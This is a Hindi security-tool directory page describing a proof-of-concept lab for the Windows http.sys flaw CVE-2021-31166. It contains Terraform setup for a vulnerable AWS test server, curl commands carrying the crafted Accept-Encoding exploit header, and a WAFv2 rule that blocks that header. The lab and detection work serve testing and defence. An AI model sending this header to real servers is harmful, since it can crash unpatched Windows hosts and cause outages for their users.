Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WIn-CVE-2021-31166 — AWS पर Terraform तैनाती के साथ CVE-2021-31166 (http.sys RCE) के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें परीक्षण स्क्रिप्ट और एक्सप्लॉइट को ब्लॉक करने के लिए WAFv2 नियम शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bgsilvait/win-cve-2021-31166
भेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब सुरक्षाक्लाउड सुरक्षाDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

AWS पर Terraform तैनाती के साथ CVE-2021-31166 (http.sys RCE) के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें परीक्षण स्क्रिप्ट और एक्सप्लॉइट को ब्लॉक करने के लिए WAFv2 नियम शामिल हैं।

रिपॉजिटरी देखें
25 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WIn-CVE-2021-31166

यह रेपो 0vercl0k द्वारा CVE-2021-31166 ("HTTP प्रोटोकॉल स्टैक रिमोट कोड निष्पादन भेद्यता") के लिए एक प्रूफ ऑफ कॉन्सेप्ट से प्रेरित है, जो http.sys में एक उपयोग-के-बाद-मुक्त (use-after-free) डीरेफरेंस है, जिसे मई 2021 में माइक्रोसॉफ्ट द्वारा पैच किया गया था।

बुनियादी ढाँचा बनाएँ

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

टेराफॉर्म Windows Server Core 20H2 के साथ एक EC2 इंस्टेंस बनाएगा, IIS स्थापित करेगा और AWS कंसोल से Web Powershell Session खोलने के लिए SSM अनुमतियाँ जोड़ेगा। यह एक भी बनाएगा और इंस्टेंस को लक्ष्य के रूप में उपयोग करेगा। डिफ़ॉल्ट रूप से पर पहुँचने की अनुमति के लिए केवल जोड़ेगा।

Application Load Balancer
Security Group
HTTP
आपका IP

मान प्राप्त करें

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

कनेक्टिविटी का परीक्षण

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

CVE हेडर इंजेक्ट करें

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

AWS WAFv2 के लिए ब्लॉक करने का नियम

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
टूल डाउनलोड करें